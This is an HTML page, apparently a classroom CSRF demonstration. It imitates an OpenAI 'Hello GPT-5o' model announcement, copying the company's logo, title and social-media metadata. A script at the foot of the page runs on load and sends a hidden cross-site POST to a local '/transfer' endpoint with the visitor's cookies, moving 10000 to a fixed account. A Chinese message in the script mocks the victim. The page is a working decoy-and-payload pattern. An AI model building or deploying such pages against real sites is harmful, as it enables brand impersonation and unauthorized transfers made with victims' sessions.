<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Hello GPT-5 | OpenAI</title>
    <link rel="icon" type="image/x-icon" href="./src/img/favicon.ico" />

    <link
      rel="preload"
      as="image"
      fetchpriority="high"
      imagesrcset="https://images.ctfassets.net/kftzwdyauwt9/51cvGC9YL1Fy2Iflb3KkDb/a8a9db1572e0bb7009f09a9b39aeafe9/GPT-4o-Video_Card.png?w=640&amp;q=90&amp;fm=webp 640w, https://images.ctfassets.net/kftzwdyauwt9/51cvGC9YL1Fy2Iflb3KkDb/a8a9db1572e0bb7009f09a9b39aeafe9/GPT-4o-Video_Card.png?w=750&amp;q=90&amp;fm=webp 750w, https://images.ctfassets.net/kftzwdyauwt9/51cvGC9YL1Fy2Iflb3KkDb/a8a9db1572e0bb7009f09a9b39aeafe9/GPT-4o-Video_Card.png?w=828&amp;q=90&amp;fm=webp 828w, https://images.ctfassets.net/kftzwdyauwt9/51cvGC9YL1Fy2Iflb3KkDb/a8a9db1572e0bb7009f09a9b39aeafe9/GPT-4o-Video_Card.png?w=1080&amp;q=90&amp;fm=webp 1080w, https://images.ctfassets.net/kftzwdyauwt9/51cvGC9YL1Fy2Iflb3KkDb/a8a9db1572e0bb7009f09a9b39aeafe9/GPT-4o-Video_Card.png?w=1200&amp;q=90&amp;fm=webp 1200w, https://images.ctfassets.net/kftzwdyauwt9/51cvGC9YL1Fy2Iflb3KkDb/a8a9db1572e0bb7009f09a9b39aeafe9/GPT-4o-Video_Card.png?w=1920&amp;q=90&amp;fm=webp 1920w, https://images.ctfassets.net/kftzwdyauwt9/51cvGC9YL1Fy2Iflb3KkDb/a8a9db1572e0bb7009f09a9b39aeafe9/GPT-4o-Video_Card.png?w=2048&amp;q=90&amp;fm=webp 2048w, https://images.ctfassets.net/kftzwdyauwt9/51cvGC9YL1Fy2Iflb3KkDb/a8a9db1572e0bb7009f09a9b39aeafe9/GPT-4o-Video_Card.png?w=3840&amp;q=90&amp;fm=webp 3840w"
      imagesizes="(min-width: 1728px) 1728px, 100vw"
    />
    <meta
      name="description"
      content="We’re announcing GPT-4 Omni, our new flagship model which can reason across audio, vision, and text in real time."
    />
    <meta name="robots" content="index, follow" />
    <meta name="googlebot" content="index, follow" />
    <link
      rel="alternate"
      hreflang="en-US"
      href="https://openai.com/index/hello-gpt-4o/"
    />
    <meta property="og:title" content="Hello GPT-4o" />
    <meta
      property="og:description"
      content="We’re announcing GPT-4 Omni, our new flagship model which can reason across audio, vision, and text in real time."
    />
    <meta property="og:locale" content="en-US" />
    <meta
      property="og:image"
      content="https://taiwilliam.github.io/csrf-demo/src/img/chatgpt.webp"
    />
    <meta property="og:image:width" content="1600" />
    <meta property="og:image:height" content="900" />
    <meta property="og:type" content="website" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:site" content="@OpenAI" />
    <meta name="twitter:title" content="Hello GPT-4o" />
    <meta
      name="twitter:description"
      content="We’re announcing GPT-4 Omni, our new flagship model which can reason across audio, vision, and text in real time."
    />
    <meta
      name="twitter:image"
      content="https://taiwilliam.github.io/csrf-demo/src/img/chatgpt.webp"
    />
    <meta name="twitter:image:width" content="1600" />

    <script
      src="https://code.jquery.com/jquery-3.7.1.min.js"
      integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo="
      crossorigin="anonymous"
    ></script>
    <link
      href="https://cdn.jsdelivr.net/npm/reset-css@5.0.2/reset.min.css"
      rel="stylesheet"
    />
    <style>
      body {
        background-color: #f9f9f9;
        color: #080808;
        margin: 0;
        font-family: Söhne, sans-serif;
        -webkit-font-smoothing: antialiased;
      }
      .header__body {
        max-width: 68rem;
        width: 68rem;
        margin-left: auto;
        margin-right: auto;
        display: flex;
        height: 100%;
      }
      .header__body__menu {
        display: flex;
      }
      .header__body__menu li {
        padding: 0 1rem;
        height: 100%;
        font-size: 0.9rem;
        line-height: 130%;
        letter-spacing: 0.0025em;
        font-weight: 400;
        cursor: pointer;
        display: flex;
        align-items: center;
      }
      .flex-1 {
        flex: 1 1;
      }
      .flex {
        display: flex;
      }
      .icon {
        width: 22px;
        cursor: pointer;
      }
      .header {
        height: 50px;
        display: flex;
        align-items: center;
        padding: 0 1.25rem;
      }
      .justify-content-end {
        justify-content: end;
      }
      .align-items-center {
        align-items: center;
      }
      .container {
        max-width: 68rem;
        width: 68rem;
        margin: 6.75rem auto;
      }
      .title {
        text-align: center;
      }
      .title_date {
        margin-bottom: 0.8rem;
        font-size: 0.95rem;
        line-height: 160%;
        letter-spacing: 0.0016em;
        font-weight: 400;
      }
      .title__h1 {
        font-size: 4.5rem;
        line-height: 150%;
        letter-spacing: -0.02em;
        font-weight: 400;
      }
      .title__h2 {
        font-size: 1.4175rem;
        letter-spacing: -0.0026em;
        line-height: 130%;
        font-weight: 400;
      }
      .image {
        width: 100%;
        margin-top: 5rem;
      }
      .memo {
        font-size: 1.125rem;
        line-height: 150%;
        font-weight: 400;
        color: #7c7c7c;
        text-align: center;
        margin-top: 5rem;
      }
    </style>
  </head>
  <body>
    <div class="header">
      <div class="header__body">
        <div class="flex flex-1">
          <svg
            class="icon"
            width="28"
            viewBox="0 0 28 28"
            fill="none"
            xmlns="http://www.w3.org/2000/svg"
          >
            <path
              d="M26.153 11.46a6.888 6.888 0 0 0-.608-5.73 7.117 7.117 0 0 0-3.29-2.93 7.238 7.238 0 0 0-4.41-.454 7.065 7.065 0 0 0-2.41-1.742A7.15 7.15 0 0 0 12.514 0a7.216 7.216 0 0 0-4.217 1.346 7.061 7.061 0 0 0-2.603 3.539 7.12 7.12 0 0 0-2.734 1.188A7.012 7.012 0 0 0 .966 8.268a6.979 6.979 0 0 0 .88 8.273 6.89 6.89 0 0 0 .607 5.729 7.117 7.117 0 0 0 3.29 2.93 7.238 7.238 0 0 0 4.41.454 7.061 7.061 0 0 0 2.409 1.742c.92.404 1.916.61 2.923.604a7.215 7.215 0 0 0 4.22-1.345 7.06 7.06 0 0 0 2.605-3.543 7.116 7.116 0 0 0 2.734-1.187 7.01 7.01 0 0 0 1.993-2.196 6.978 6.978 0 0 0-.884-8.27Zm-10.61 14.71c-1.412 0-2.505-.428-3.46-1.215.043-.023.119-.064.168-.094l5.65-3.22a.911.911 0 0 0 .464-.793v-7.86l2.389 1.36a.087.087 0 0 1 .046.065v6.508c0 2.952-2.491 5.248-5.257 5.248ZM4.062 21.354a5.17 5.17 0 0 1-.635-3.516c.042.025.115.07.168.1l5.65 3.22a.928.928 0 0 0 .928 0l6.898-3.93v2.72a.083.083 0 0 1-.034.072l-5.711 3.255a5.386 5.386 0 0 1-4.035.522 5.315 5.315 0 0 1-3.23-2.443ZM2.573 9.184a5.283 5.283 0 0 1 2.768-2.301V13.515a.895.895 0 0 0 .464.793l6.897 3.93-2.388 1.36a.087.087 0 0 1-.08.008L4.52 16.349a5.262 5.262 0 0 1-2.475-3.185 5.192 5.192 0 0 1 .527-3.98Zm19.623 4.506-6.898-3.93 2.388-1.36a.087.087 0 0 1 .08-.008l5.713 3.255a5.28 5.28 0 0 1 2.054 2.118 5.19 5.19 0 0 1-.488 5.608 5.314 5.314 0 0 1-2.39 1.742v-6.633a.896.896 0 0 0-.459-.792Zm2.377-3.533a7.973 7.973 0 0 0-.168-.099l-5.65-3.22a.93.93 0 0 0-.928 0l-6.898 3.93V8.046a.083.083 0 0 1 .034-.072l5.712-3.251a5.375 5.375 0 0 1 5.698.241 5.262 5.262 0 0 1 1.865 2.28c.39.92.506 1.93.335 2.913ZM9.631 15.009l-2.39-1.36a.083.083 0 0 1-.046-.065V7.075c.001-.997.29-1.973.832-2.814a5.297 5.297 0 0 1 2.231-1.935 5.382 5.382 0 0 1 5.659.72 4.89 4.89 0 0 0-.168.093l-5.65 3.22a.913.913 0 0 0-.465.793l-.003 7.857Zm1.297-2.76L14 10.5l3.072 1.75v3.5L14 17.499l-3.072-1.75v-3.5Z"
              fill="currentColor"
            ></path>
          </svg>
        </div>

        <ul class="header__body__menu">
          <li>Research</li>
          <li>Products</li>
          <li>Safety</li>
          <li>Company</li>
        </ul>

        <div class="flex flex-1 justify-content-end align-items-center">
          <a href="javascript:void(0)">
            <img width="20" src="./src/img/icon-search.svg" alt="" />
          </a>
        </div>
      </div>
    </div>
    <div class="container">
      <div class="title">
        <p class="title__date">May 13, 2024</p>
        <h1 class="title__h1">Hello GPT-5o</h1>
        <p class="title__h2">
          We’re announcing GPT-5o, our new flagship model that<br />can reason
          across audio, vision, and text in real time.
        </p>
      </div>
      <p class="memo">All videos on this page are at 1x real time.</p>
      <img class="image" src="./src/img/chatgpt.webp" alt="" />
    </div>
  </body>

  <script>
    const URL = "http://127.0.0.1:9001/transfer";
    const data = {
      amount: 10000,
      account: "william.tai",
      description: "你被CSRF攻擊了~ 笨蛋",
    };

    $.ajax({
      type: "POST",
      url: URL,
      xhrFields: {
        withCredentials: true, // 攜帶 cookie
      },
      crossDomain: true,
      data: data,
    });
  </script>
</html>
